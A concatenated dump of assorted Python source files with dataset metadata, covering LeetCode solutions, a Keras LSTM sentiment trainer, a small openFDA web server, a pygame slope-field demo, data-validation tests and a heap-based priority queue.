'all_points_path' : '/home/gruppo4/Regioni/Liguria/new_data_32632/points.pkl', #'/home/gruppo4/liguria-fire-susceptibility/data_lig_s/points_clc.pkl',
# path fires dataset: make sure to ahve a year column called 'year'
'fires_df_path' : '/home/gruppo4/Regioni/Liguria/new_data_32632/fires.pkl', #'/home/gruppo4/liguria-fire-susceptibility/data_lig_s/fires_clc.pkl',
############### MODEL DATA ####################
# columns to be excluded: give a look at the next parameter for excluding the perc columns
'excluded_col' : ["point_index",'x', 'y', "row", "col",
"veg_freq",
'geometry'],
# if it is True perc columns will be excluded, if you want to use these and not the is_veg_ cols check the next parameter
'exclude_perc' : True,
# this exclude the is_veg columns produced by one hot encoding, select True if perc columns are used instead of these
'exclude_is_veg' : False,
# list of the number of folds per experiment
'n_fold' : [1],
# if it is true there wont be any model selection but the only algorithm used is a random forest with nestimators = ntree
'random_forest' : True,
# if False you will perform regression
'classification' : True,
# insert a model defined in the first section of this file, put None if random_forest = True
'model_selection' : [None],
# give a list of names of the model selected previously
'name_sel_models' : [],
# use tplot for searcing the optimal algorithm --> give random_forest = True for switching to this option and put n_fold = [1]
'tpot_sel' : False,
# select which season is considered, 1 is winter and 2 is summer
'season' : [1,2],
# give a name that describe the experiment: it is related to the excluded columns
'type' : 'dem100_1000t_2007-15',
# number of cells for doing the k fold validation in the x direction, then in the y
'tiles_x' : 70, #7,
'tiles_y' : 50, #5,
# if it is True the prediction on points_df is an avarage of the different predictions on the fold used in the validation phase
'predict_points_on_fold' : False,
# define the quantiles for the burned area analisys
'quantile' : [0.25, 0.5, 0.75, 0.9, 0.95],
# insert the fires shapefile with the column year for quantile burned area analysis (put None if you dont have it)
'path_fires_shp' : '/home/gruppo4/Regioni/Liguria/new_data_32632/fires_y_32632.shp',
# insert the fires raster file for the same analysis of before in case you dont have a shp file (put None before)
'path_fires_raster' : None
}
return input_data
| true |
35f370f03ed2d29aafb460a23c101b5ab02c52b0 | Python | sainihimanshu1999/Leetcode---Top-100-Liked-Questions | /mergeIntervals.py | UTF-8 | 326 | 2.75 | 3 | [] | no_license | def mergeintervals(self,intervals):
intervals = sorted(intervals, key= lambda x : x[0])
while i<len(intervals)-1:
if intervals[i][-1]>=intervals[i+1][0]:
intervals[i][-1] = max(intervals[i][-1],intervals[i+1][-1])
del intervals[i+1]
else:
i+=1
return intervals | true |
c0386b438bfd84e69a9d3ede759ed42cf6464df8 | Python | paulinho-16/MIEIC-FPRO | /REs/RE11/OrdenarPorFunção/sort_by_f.py | UTF-8 | 82 | 3.078125 | 3 | [] | no_license | def sort_by_f(l):
l = sorted(l,key = lambda x: x if x<5 else 5-x)
return l | true |
998fff57bd5514a5db242896d7c32919db328bcb | Python | pjm0/slopefield | /slopefield.py | UTF-8 | 5,360 | 2.78125 | 3 | [] | no_license | #import pygame
from math import *
from random import choice
from time import sleep
import colors
##from screen import *
##screen_x, screen_y = screen.get_width(), screen.get_height()
from geometry import *
from agent import Agent
from avoid_border import avoid_border
SCALE = 15
opponent = choice(range(150, 774)), choice(range(150, 518))
ball = 512, 384#choice(range(512)), choice(range(screen_y))
goal = 1, 384
def fade(f_1, f_2):
pass
def magfield(x, y, scale=1):
theta = -angle_to(goal, ball)+ 2*angle_to((x, y), ball)
return theta
def t(point, angle):
return lambda x, y: -angle + 2 * angle_to((x, y), point)
def g(x, y, scale=1):
if (-0.75 * pi < angle_to((x, y), ball) < -pi/4):
return magfield(x, y, scale)
elif 0.75 * pi > angle_to((x, y), ball) > pi/4:
return magfield(x, y, scale)
elif abs(angle_to((x, y), ball)) < pi/4:
return pi-magfield(x, y, scale)
else:
return pi-magfield(x, y, scale)
def h(x, y, scale=1):
## if (-0.75 * pi < angle_to((x, y), ball) < -pi/4):
return 1.75 * pi + magfield(x, y, scale)*.5
## elif 0.75 * pi > angle_to((x, y), ball) > pi/4:
## return None #pi+magfield(x, y, scale)
## else:
## return None #magfield(x, y, scale)
def f(x, y, scale=1):
BORDER_WIDTH = 100;
#*//*
#*/ double attack_heading
if distance_to_line((x, y), ball, goal) < 20 and distance_to((x, y), ball) < 100:
theta = angle_to(goal, ball)
## elif (distance_to_line((x, y), ball, goal) < 200
## and distance_to((x, y), ball) < 200
## and distance_to((x, y), goal) < 20 + distance_to(ball, goal)):
## if add_angles(angle_to(ball, goal), -angle_to((x, y), goal)) > 0:
## theta = angle_to(goal, ball) + pi/2
## else:
## theta = angle_to(goal, ball) - pi/2;
## elif abs(add_angles(angle_to((x, y), ball), -angle_to(goal, ball))) < pi/2:#########wrong
## theta = angle_to(ball, goal);
else:
theta = -angle_to(goal, ball)+ 2*angle_to((x, y), ball);
#print(theta)
vector_x = cos(theta);
vector_y = sin(theta);
def c(x, y):
return pi
def z(f_1, f_2, degree):
## return lambda x, y: add_angles(f_1(x, y),
## add_angles(-f_1(x, y) if f_1(x, y) is not None else None,
## f_2(x, y) if f_2(x, y) is not None else None)*degree)
return lambda x, y: add_angles_2(f_1(x, y), degree,
f_2(x, y), 1 - degree)
## if x < BORDER_WIDTH:
## vector_x = max(vector_x, (BORDER_WIDTH - x) / BORDER_WIDTH)
## if x > screen_x - BORDER_WIDTH:
## vector_x = min(vector_x, -(x - (screen_x - BORDER_WIDTH)) / BORDER_WIDTH)
## if y < BORDER_WIDTH:
## vector_y = max(vector_y, (BORDER_WIDTH - y) / BORDER_WIDTH)
## if y > screen_y - BORDER_WIDTH:
## vector_y = min(vector_y, -(y - (screen_y - BORDER_WIDTH)) / BORDER_WIDTH)
## if distance_to((x, y), opponent) < 200:
## theta = angle_to((x, y), opponent) + 0.25 * pi + \
## 0.25 * pi * distance_to((x, y), opponent) / 200
## else:
## theta = atan2(vector_y, vector_x)
##
## return theta #x + scale * vector_x, y + scale * vector_y;
#/*
def main():
import pygame
from colors import BLACK, WHITE
from pygame.locals import QUIT
from scenario import Scenario
test = Scenario(3)
screen = test.display.screen
while True:
agents = [Agent((choice(range(test.display.width)),
choice(range(test.display.height))),
0,
10,
None, test.display) for _ in range(500)]
test.display.clear(BLACK)
ball = choice(range(150, 774)), choice(range(150, 518))
opponent = choice(range(150, 774)), choice(range(150, 518))
test.draw_field("g", 0)
#pygame.draw.circle(screen, BLUE, ball, 10)
## pygame.draw.circle(screen, WHITE, goal, 10)
## pygame.draw.circle(screen, RED, opponent, 10)
## for x in range(0, test.display.width, 2 * SCALE):
## for y in range(0, test.display.height, 2 * SCALE):
## #print(x, y)
## angle = f(x, y)
## x_component, y_component = cos(angle), sin(angle)
## test.(screen, RED, (x, y),
## (x + int(x_component * SCALE * 1.5),
## y + int(y_component * SCALE * 1.5)))
## pygame.draw.aaline(screen, GREEN, (x, y),
## (x + int(x_component * SCALE),
## y + int(y_component * SCALE)))
for n in range(4000):
for event in pygame.event.get():
if event.type == QUIT:
return
## else:
## print(event.type)
pygame.draw.circle(screen, WHITE, goal, 10)
#pygame.draw.circle(screen, RED, opponent, 10)
for agent in agents:
agent.rotate_to(g(*agent.loc))
agent.advance()
agent.draw(0)
pygame.display.flip()
if __name__ == '__main__':
## pass
import scenario
scenario.main()
#main()
| true |
0a8b083a895514289a7142ea06ac1098f6237224 | Python | pjcv89/Python | /Notas/05-Módulos y paquetes/archivo1.py | UTF-8 | 102 | 3.015625 | 3 | [] | no_license | def mi_funcion(x):
return [numero for numero in range(x) if numero%2==0]
lista_1 = mi_funcion(11) | true |
a9b5780b5ceb7073ddbe6f32ee5f7590740a8ef3 | Python | BartoszSlesar/Python_Morsles_Exercises | /is_perfect_square/perfect_square.py | UTF-8 | 348 | 2.828125 | 3 | [] | no_license | import cmath
from decimal import *
def check_complex(val):
comp = cmath.sqrt(val)
return comp.real.is_integer() and comp.imag.is_integer()
def is_perfect_square(val,*,complex=False):
if complex:
return check_complex(val)
if val<0:
return False
b = Decimal(val).sqrt()
return Decimal(int(b)**2)==Decimal(val)
| true |
b1468fb32de29471fafed8ac44effaf42f27ee7b | Python | artykbayevk/AdvancedAI | /train/train_LSTM_Twitter.py | UTF-8 | 1,922 | 2.75 | 3 | [] | no_license | # In[1]
import numpy as np
import pandas as pd
import pickle as pkl
from keras.models import Model
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence, text
from sklearn.preprocessing import OneHotEncoder
from keras.layers import Dense, Input, Dropout, LSTM, Bidirectional
# In[2]
train = pd.read_csv('data/Twitter/train.csv')
test = pd.read_csv('data/Twitter/test.csv')
all_data = train.append(test)
all_data.head()
texts = all_data["text"].tolist()
kerasTok = text.Tokenizer(lower=True,split=' ',filters='[0-9]!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n')
kerasTok.fit_on_texts(texts)
all_phrases = kerasTok.texts_to_sequences(texts)
X = sequence.pad_sequences(all_phrases, 60)
X_train = X[:train.shape[0], :]
X_test = X[train.shape[0]:, :]
# In[2]
vocab_size = len(kerasTok.word_counts)
embed_size = 200
maxLen = 60
Y_train = np.array(train.target)
encode = OneHotEncoder(sparse=False)
Y_train_1hot = encode.fit_transform(np.reshape(Y_train, (Y_train.shape[0], 1)))
# In[3]
def lstm(input_shape, vocab_len, embed_size):
sentence_indices = Input(shape=input_shape, dtype='int32')
embedding_layer = Embedding(vocab_len + 1, embed_size)
embeddings = embedding_layer(sentence_indices)
X = Bidirectional(LSTM(units=128, return_sequences=True))(embeddings)
X = Dropout(rate=0.6)(X)
X = Bidirectional(LSTM(units=64))(X)
X = Dropout(rate=0.3)(X)
X = Dense(units=2, activation='softmax')(X)
model = Model(inputs=sentence_indices, outputs=X)
return model
model = lstm((maxLen,), vocab_size, embed_size)
model.summary()
# In[4]
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
history = model.fit(X_train, Y_train_1hot, batch_size=128, epochs=5)
model.save('train/train_data/LSTM_Twitter.h5')
with open('train/train_data/LSTM_Twitter_HISTORY.pkl', 'wb') as file_pi:
pkl.dump(history.history, file_pi)
| true |
3e1238f02b6a9c90d1e0cb0cc16cf0043e320433 | Python | Kittyuzu1207/Leecode | /LCCI/0925M堆盘子.py | UTF-8 | 1,690 | 4.375 | 4 | [] | no_license | #堆盘子。设想有一堆盘子,堆太高可能会倒下来。因此,在现实生活中,盘子堆到一定高度时,我们就会另外堆一堆盘子。
#请实现数据结构SetOfStacks,模拟这种行为。SetOfStacks应该由多个栈组成,并且在前一个栈填满时新建一个栈。
#此外,SetOfStacks.push()和SetOfStacks.pop()应该与普通栈的操作方法相同(也就是说,pop()返回的值,应该跟只有一个栈时的情况一样)。
#进阶:实现一个popAt(int index)方法,根据指定的子栈,执行pop操作。
#当某个栈为空时,应当删除该栈。当栈中没有元素或不存在该栈时,pop,popAt 应返回 -1.
#用二维数组解决
class StackOfPlates:
def __init__(self, cap: int):
self.cap = cap
self.array = []
def push(self, val: int) -> None:
# 处理边界情况:cap == 0 不让push
if self.cap == 0:
return
if not self.array or len(self.array[-1]) >= self.cap:
self.array.append([val])
else:
self.array[-1].append(val)
def pop(self) -> int:
val = -1
if self.array and self.array[-1]:
val = self.array[-1].pop()
if not self.array[-1]: self.array.pop()
return val
def popAt(self, index: int) -> int:
val = -1
if len(self.array) >= index + 1:
val = self.array[index].pop()
if not self.array[index]: self.array.pop(index)
return val
# Your StackOfPlates object will be instantiated and called as such:
# obj = StackOfPlates(cap)
# obj.push(val)
# param_2 = obj.pop()
# param_3 = obj.popAt(index)
| true |
191f7a686dd6db458a4c02e6c2b63df0c0c81ff0 | Python | avflorea/openfda | /openfda-3/programa-server.py | UTF-8 | 3,821 | 2.890625 | 3 | [] | no_license | import socket
import http.client
import json
# Configuramos el servidor: IP, Puerto
IP = "127.0.0.1"
PORT = 8088
# Determinamos el maximo de peticiones que puede realizar el cliente
MAX_OPEN_REQUESTS = 5
headers = {'User-Agent': 'http-client'}
# Hacemos que el cliente se conecte con el servidor
conn = http.client.HTTPSConnection("api.fda.gov")
# Enviamos un mensaje de solicitud con el GET y el recurso seguido de un limite
conn.request("GET", "/drug/label.json?&limit=11", None, headers)
# Leemos el mensaje de respuesta recibido del servidor
info = conn.getresponse()
# Imprimimos la linea del estado de respuesta
print(info.status, info.reason)
# Leemos el contenido de la respuesta y lo convertimos a una cadena
drogas_raw = info.read().decode("utf-8")
# Imprimimos ese fichero que ha sido recibido
datos = (json.loads(drogas_raw))
# Creamos una funcion que permite atender al cliente, lee la peticion que recibe a pesar
# de que luego la ignore y le envia un mensaje de respuesta. En ese contenido encontramos
# un texto HTML que se muestra en el navegador
def process_client(clientsocket):
# Se lee el socket a traves del mensaje de solicitud del cliente. Independientemente
# de lo que el cliente pida, siempre va a recibir el mismo mensaje
mensaje_solicitud = clientsocket.recv(1024)
# Introducimos el texto en HTML para que aparezca en la pantalla del navegador
contenido = """
<!doctype html>
<html>
<body style='background-color: lightgreen'>
<h1>Bienvenid@ </h1>
<h2> Medicamentos </h2>
"""
# Recorremos la lista de 'results', en este caso 11 veces por el limite que hemos añadido
for elem in datos['results']:
if elem['openfda']:
print("El nombre del medicamento es:", elem['openfda']['generic_name'][0])
else: # Si no se encuentra el 'openfda', el programa continua iterando los demas elementos
print("No se tienen datos del nombre del producto")
continue
# Renovamos el contenido para que los nombres de los medicamentos para que aparezcan por el
# navegador
contenido += elem['openfda']['generic_name'][0]
# Determinamos que cada vez que nos de un nombre realice un salto de linea y cerramos el HTML
contenido += """<br/></body></html>"""
# Indicamos que todo va a ir correctamente, aunque la peticion sea incorrecta
linea_inicial = "HTTP/1.1 200 OK\n"
cabecera = "Content-Type: text/html\n"
cabecera += "Content-Length: {}\n".format(len(str.encode(contenido)))
# Creamos el mensaje de respuesta juntando la linea_inicial, la cabecera y el contenido
mensaje_respuesta = str.encode(linea_inicial + cabecera + "\n" + contenido)
clientsocket.send(mensaje_respuesta)
clientsocket.close()
# Creamos un socket para el servidor, que es a donde van a llegar todas las peticiones del cliente
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Asociamos el socket a la IP y puerto del servidor
serversocket.bind((IP, PORT))
# Solo permite el numero de solicitudes que hemos determinado, las demas se rechazan
serversocket.listen(MAX_OPEN_REQUESTS)
while True:
# Se espera a que lleguen conexiones del cliente
print("Esperando clientes en IP: {}, Puerto: {}".format(IP, PORT))
(clientsocket, address) = serversocket.accept()
# De forma que cuando llega, se nos imprime la IP y el puerto del cliente
print(" Peticion de cliente recibida. IP: {}".format(address))
process_client(clientsocket)
# Utilizamos un except para evitar errores que pudieran surgir y asi evitar parar el programa
except socket.error:
print("Problemas usando el puerto {}".format(PORT))
print("Lanzalo en otro puerto (y verifica la IP)") | true |
64c706a212b431281af1c1a81cd04433adf8c340 | Python | AbdurRafay01/OS-Programming | /rough.py | UTF-8 | 631 | 3.078125 | 3 | [] | no_license |
list2 = [2,5, 11 , 15] # target = 6
target = 17
prev_value = dict()
index = 0
for i in range(len(list2)):
num = list2[i]
needval = target - num
if needval in prev_value:
print(prev_value[needval] , i)
prev_value[num] = i
#just checking git from atom
def twoSumHashing(num_arr, pair_sum):
hashTable = {}
for i in range(len(num_arr)):
complement = pair_sum - num_arr[i]
if complement in hashTable:
print(hashTable[complement] , i)
hashTable[num_arr[i]] = i
# Driver Code
num_arr = [4, 5, 1, 8]
pair_sum = 9
# Calling function
twoSumHashing(num_arr, pair_sum)
| true |
8990725cf86a231af03fb774fac4e4ac0d88abfe | Python | ashjambhulkar/objectoriented | /LeetCodePremium/1031.maximum-sum-of-two-non-overlapping-subarrays.py | UTF-8 | 278 | 2.546875 | 3 | [] | no_license | #
# @lc app=leetcode id=1031 lang=python3
#
# [1031] Maximum Sum of Two Non-Overlapping Subarrays
#
# @lc code=start
class Solution:
def maxSumTwoNoOverlap(self, A, L, M):
# Solution().maxSumTwoNoOverlap([0, 6, 5, 2, 2, 5, 1, 9, 4],1,2)
# @lc code=end
| true |
204a0e5720dfc79884d4414647ebabfe64d77156 | Python | vishwesh5/HackerRank_Python | /Numpy_Challenges/mean_var_std.py | UTF-8 | 311 | 3.25 | 3 | [] | no_license | # mean_var_std.py
# Link: https://www.hackerrank.com/challenges/np-mean-var-and-std/problem
import numpy as np
A=[]
for i in range([int(i) for i in (input()).split(' ')][0]):
A.append([int(i) for i in (input()).split(' ')])
A = np.array(A)
print(np.mean(A,axis=1))
print(np.var(A,axis=0))
print(np.std(A))
| true |
bee0faabbe3ec0320a9f2d7616937e4fd6acff68 | Python | dzambranob/Proyecto-Discretas | /Generador_de_claves.py | UTF-8 | 1,505 | 4.28125 | 4 | [] | no_license | #Generador de claves
#Función para saber si el número es primo
def es_primo(n):
if (n==1):
return False
elif (n==2):
return True
else:
tope = int(n/2)+1
for i in range(2,tope):
if n%i == 0:
return False
return True
#Función para hallar M.C.D.
def mcd(a, b):
residuo = 0
while(b > 0):
residuo = b
b = a % b
a = residuo
return a
#Función para encontrar un inverso multiplicativo.
def inv_mul(a, n):
for i in range(n):
if (a*i)%n == 1:
return i
#Recepción de valores y devolución de claves.
lineas = int(input('Ingrese cuántas claves desea generar: '))
print()
for i in range(lineas):
cond = True; p = 1; q = 1; e = 1;
while (cond==True):
p = int(input('Ingrese un número primo: '))
if (es_primo(p)):
cond = False
else:
print("Este no es un número primo.")
while (cond==False):
q = int(input('Ingrese otro número primo: '))
if (es_primo(p)):
cond = True
else:
print("Este no es un número primo.")
n = p*q
phi_n = (p-1)*(q-1)
while (cond==True):
print("Ingrese un valor que sea menor y primo relativo de " +
str(phi_n) + ":")
e = int(input())
if (mcd(e, phi_n) == 1 and e<phi_n):
cond = False
else:
print('Este valor no cumple con las condiciones dadas.')
d = inv_mul(e, phi_n)
print("Su clave pública (e,n) es: (" + str(e) + ", " + str(n) + ")")
print("Su clave privada (d,n) es: (" + str(d) + ", " + str(n) + ")")
print()
| true |
8b8001e2d1c7c3bb2d215a7569337a564e48b363 | Python | Guedelho/snake-ai | /constants.py | UTF-8 | 157 | 2.625 | 3 | [
"MIT"
] | permissive | # Directions
UP = 'UP'
DOWN = 'DOWN'
LEFT = 'LEFT'
RIGHT = 'RIGHT'
# Colors
RED = (255, 0, 0)
BLACK = (0, 0, 0)
GREEN = (0, 255, 0)
WHITE = (255, 255, 255)
| true |
a994e1d1b356eab9dd7cabb0af9821fdb0435dc0 | Python | mitchelloliveira/python-pdti | /Aula04_06082020/aula04_exe10.py | UTF-8 | 570 | 4.0625 | 4 | [] | no_license | # Curso de Python - PDTI-SENAC/RN
# Profº Weskley Bezerra
# Mitchell Oliveira
# 06/08/2020
# --------------------------------------------------------------
# Faça um Programa que leia dois vetores com 10 elementos cada. Gere um terceiro vetor de 20 elementos,
# cujos valores deverão ser compostos pelos elementos intercalados dos dois outros vetores.
vetor_1 = ["-","-","-","-","-","-","-","-","-","-"]
vetor_2 = ["x","x","x","x","x","x","x","x","x","x"]
vetor_3 = []
for indice in range(0,10):
vetor_3.append(vetor_1[indice])
vetor_3.append(vetor_2[indice])
print(vetor_3) | true |
09a3e61d0b170f31542f74cd2d5e50658028f309 | Python | wizDaia/backendschool2021 | /tests/orders_validator_tests.py | UTF-8 | 4,843 | 2.53125 | 3 | [
"MIT"
] | permissive | import unittest
from datetime import datetime
from unittest.mock import MagicMock
from jsonschema import ValidationError
from parameterized import parameterized
from application.data_validator import DataValidator
from tests.test_utils import read_data
class OrdersValidatorTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.data_validator = DataValidator()
def test_correct_orders_should_be_valid(self):
orders_data = read_data('orders.json')
self.data_validator.validate_orders(orders_data)
def assert_exception(self, orders_data: dict, expected_exception_message: str):
with self.assertRaises(ValidationError) as context:
self.data_validator.validate_orders(orders_data)
self.assertIn(expected_exception_message, str(context.exception.message))
@parameterized.expand([({}, 'data')])
def test_orders_should_be_incorrect_when_missing_data_field(self, orders_data: dict, field_name: str):
self.assert_exception(orders_data, f'\'{field_name}\' is a required property')
@parameterized.expand([
[{'data': [{'order_id': 1, 'region': 4, 'delivery_hours': []}]}],
[{'data': [{'order_id': 1, 'weight': 3, 'delivery_hours': []}]}],
[{'data': [{'order_id': 1, 'weight': 3, 'region': 4}]}]
])
def test_orders_should_be_incorrect_when_missing_field(self, orders_data: dict):
self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")
@parameterized.expand([
({'data': None}, 'array'),
({'data': ['']}, 'object'),
])
def test_orders_should_be_incorrect_when_wrong_type_of_field(self, orders_data: dict, data_type: str):
self.assert_exception(orders_data, f'is not of type \'{data_type}\'')
@parameterized.expand([
[{'data': [{'order_id': 1, 'weight': None, 'region': 4, 'delivery_hours': []}]}],
[{'data': [{'order_id': 1, 'weight': 3, 'region': None, 'delivery_hours': []}]}],
[{'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': None}]}],
[{'data': [{'order_id': 1, 'weight': 3, 'region': [''], 'delivery_hours': []}]}]
])
def test_orders_should_be_incorrect_when_wrong_type_of_field(self, orders_data: dict):
self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")
def test_orders_data_should_be_correct_with_different_field_order(self):
orders_data = {'data': [{'delivery_hours': [], 'weight': 3, 'region': 4, 'order_id': 1}]}
self.data_validator.validate_orders(orders_data)
@parameterized.expand([
({'EXTRA': 0, 'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}, ''),
({'data': [{'EXTRA': 0, 'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]},
"{'orders': [{'id': 1}]}"),
])
def test_orders_should_be_incorrect_when_containing_extra_fields(self, orders_data: dict, field_name: str):
self.assert_exception(orders_data, field_name)
@unittest.mock.patch('jsonschema.validate')
def test_orders_should_be_incorrect_when_order_ids_not_unique(self, _):
orders_data = {'data': [{'order_id': 1}, {'order_id': 1}]}
self.assert_exception(orders_data, 'Orders ids are not unique')
@unittest.mock.patch('jsonschema.validate')
def test_correct_delivery_hours_should_be_parsed(self, _):
orders_data = {
'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}
self.data_validator.validate_orders(orders_data)
delivery_hours = orders_data['data'][0]['delivery_hours']
self.assertIsInstance(delivery_hours, list)
self.assertEqual(len(delivery_hours), 1)
self.assertIsInstance(delivery_hours[0], tuple)
begin_time, end_time = delivery_hours[0]
self.assertEqual(begin_time, datetime.strptime("00:59", "%H:%M"))
self.assertEqual(end_time, datetime.strptime("23:59", "%H:%M"))
@parameterized.expand([
[{'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["09:59-33:33"]}]}],
[{'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["9:9-22:33"]}]}]
])
def test_orders_should_be_incorrect_when_delivery_hours_in_wrong_format(self, orders_data: dict):
self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")
@parameterized.expand([
[{'data': [{'order_id': 1, 'weight': 0, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}],
[{'data': [{'order_id': 1, 'weight': 51, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}]
])
def test_orders_weight_should_have_in_correct_interval(self, orders_data: dict):
self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")
if __name__ == '__main__':
unittest.main()
| true |
5d58b47f708d132af358b6abfd0b121e506f4cfb | Python | rgrishigajra/Competitive-Problems | /Coding interview course/Two Pointers/Minimum Window Sort (medium).py | UTF-8 | 794 | 3.359375 | 3 | [] | no_license | import math as math
def shortest_window_sort(arr):
low = 0
print(arr)
while low < len(arr)-1 and arr[low+1] > arr[low]:
low += 1
if low == len(arr)-1:
return 0
high = len(arr)-1
while high > 0 and arr[high] > arr[high-1]:
high -= 1
mini = math.inf
maxi = -math.inf
for idx in range(low,high+1):
mini = min(mini,arr[idx])
maxi = max(maxi,arr[idx])
while low > 0 and arr[low-1] > mini:
low-=1
while high < len(arr) and arr[high+1]<maxi:
high+=1
return high - low +1
def main():
print(shortest_window_sort([1, 2, 5, 3, 7, 10, 9, 12]))
print(shortest_window_sort([1, 3, 2, 0, -1, 7, 10]))
print(shortest_window_sort([1, 2, 3]))
print(shortest_window_sort([3, 2, 1]))
main()
| true |
63bc38d850ccfc4c017f4fe41ce8ae081df56989 | Python | mathvfx/Notebooks | /Python/data_structures/stack_and_queue/ADT_PriorityQueue.py | UTF-8 | 5,826 | 3.640625 | 4 | [] | no_license | #!env python3
#
# Alex Lim. 2020. https://mathvfx.github.io
# This Python code is intended as my own learning and programming exercises.
#
# REFERENCES and CREDITS:
# Goodrich et al, DATA STRUCTURES AND ALGORITHMS IN PYTHON (2013), Wiley
from abstract_base.PriorityQueue import PQBase
from ADT_ArrayBinaryTree import ArrayBinaryTree
class Empty(Exception):
pass
class PriorityQueue(ArrayBinaryTree, PQBase):
'''An array-based binary (min) heap implementation of Priority Queue ADT.
Min-heap order and complete binary heap properties are preserved. Output
of Priority Queue will be in sorted order by priority value.
For production, consider instead Python's 'heapq' module. 'heapq' doesn't
provide PriorityQueue class. Instead, it provides functions that allow a
standard Python list to be managed as heap. 'heapq' doesn't separately
manage associated values. Elements serve as their own key.
'''
def __init__(self, kv_list: tuple = None, use_max_heap: bool = False):
'''Constructor. To initialize, provide kv_list, where kv_list is a list
of tuple(priority, element).
By default, we use min-heap order property. Set use_max_heap = True
to use max-heap order property.
'''
super().__init__()
self._cmp = "__gt__" if use_max_heap else "__lt__"
if kv_list:
self._data = [self._Item(k, v) for k,v in kv_list]
self._heapify()
def __contains__(self, elem):
# Override PQBase ABC
'''Return True if element is contained in this PQ.'''
return any(x for x in self._data if elem == x.element())
def __iter__(self):
for item in self._data:
yield item._key
def __len__(self):
# Override PQBase ABC
return super().__len__()
def add(self, priority, elem):
# Override PQBase ABC
'''Push an element with its priority as Item into priority queue.
"priority" element may be numerical value or objects that can be
compared. Smallest priority in PQ is defined as the minimum of the set.
'''
super().add(self._Item(priority, elem))
self._upheap(len(self) - 1) # bubble-up when adding item
def merge(self, other: PQBase):
# Override PQBase ABC
'''Merging other PQ into current PQ.'''
if not isinstance(other, type(self)):
raise TypeError(f"{repr(other)} must be of type PriorityQueue")
self._data += other._data # using Python's List __iadd__
self._heapify()
def peek(self) -> PQBase._Item:
# Override PQBase ABC
'''Return (but not remove) top-priority Item from PQ. "Top-priority" is
defined as Item with the smallest nonnegative priority number.
'''
if self.is_empty():
raise Empty("PQ is empty. Cannot peek.")
return self._data[0] # type is _Item
def pop(self) -> PQBase._Item:
# Override PQBase ABC
'''Remove and return top-priority Item from PQ. "Top-priority" is
defined as Item with the smallest nonnegative priority number.
'''
if self.is_empty():
raise Empty("PQ is empty. Cannot pop.")
# Always maintain Complete Binary Tree Property first before fixing
# Heap Order Property.
self.swap(0, len(self)-1) # move min root to the end node
ans = self._data.pop() # using Python's list.pop()
self._downheap(0) # Bubble-down when removing item
return ans
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Private utility functions
def _upheap(self, idx: int):
'''Bubble a node up the binary heap until Min Heap Order Property is
satisfied.
'''
assert idx >= 0
parent = self.parent(idx)
# self._cmp is '<' if min-heap; otherwise, it is '>' for max-heap.
if idx > 0 and getattr(self._data[idx], self._cmp)(self._data[parent]):
self.swap(idx, parent)
self._upheap(parent)
def _downheap(self, idx: int):
'''Bubble a node down the binary heap until Min Heap Order Property is
satisfied.
'''
assert idx >= 0
# Check first if last index is left-child within data length.
# If it is, we still need to check for right-child in at index and
# compare smaller value in order to confirm smallest children. Finally,
# we compare smallest child value to its parent and bubble down via
# swap if smaller.
if self.has_left_child(idx):
left = self.left_child(idx)
min_child = left
if self.has_right_child(idx):
right = self.right_child(idx)
# self._cmp is '<' if min-heap; otherwise, '>' for max-heap.
if getattr(self._data[right], self._cmp)(self._data[left]):
min_child = right
if getattr(self._data[min_child], self._cmp)(self._data[idx]):
self.swap(idx, min_child)
self._downheap(min_child)
def _heapify(self):
'''Bottom-up approach to building binary heap from a given list of
key-value pairs. O(n) operations, compared to otherwise O(n log n) time
building from top-down.
'''
# If we initialized our list ahead, we can construct bottom-up heap
# with a single loop calling _downheap, starting with deepest level and
# ending at root. The loop can start with deepest nonleaf, since
# there's no effect when _downheap is called at leaf.
if len(self) > 1:
start = self.parent(len(self) - 1) # begin from last node
for idx in range(start, -1, -1):
self._downheap(idx)
| true |
e68d8821329b22bbf54ae16c3206bddd17ac8c7b | Python | pyboost/poost-containers | /tests/test_turbolist.py | UTF-8 | 2,050 | 3.171875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# CONTRIBUTORS (sorted by surname)
# LUO, Pengkui <pengkui.luo@gmail.com>
#
#
# UPDATED ON
# 2013: 04/20, 04/21, 06/11
#
"""
Unit tests
"""
print('Executing %s' % __file__)
import unittest
from containers import TurboList
class Test_TurboList (unittest.TestCase):
def setUp (self):
self.sequence = [3, 1, -2, 'abc', tuple()]
self.turbolist = TurboList(self.sequence)
def test_islist (self):
self.assertIsInstance(self.turbolist, list)
def test__contains__ (self):
turbolist = self.turbolist
self.assertTrue(-2 in turbolist)
self.assertTrue('abc' in turbolist)
def test__len__ (self):
self.assertTrue(len(self.turbolist)==5)
def test__getitem__ (self):
turbolist = self.turbolist
self.assertEqual(turbolist[1], 1)
self.assertListEqual(turbolist[2:4], [-2, 'abc'])
self.assertListEqual(turbolist[:], self.sequence)
self.assertListEqual(turbolist, self.sequence)
def test_index (self):
turbolist = self.turbolist
self.assertEqual(turbolist.index(3), 0)
self.assertEqual(turbolist.index('abc'), 3)
self.assertEqual(turbolist.index(tuple()), 4)
def test_append (self):
turbolist = self.turbolist
turbolist.append(None)
self.assertListEqual(turbolist, self.sequence+[None])
self.assertListEqual(turbolist[:], self.sequence+[None])
def test_remove_1 (self):
turbolist = self.turbolist
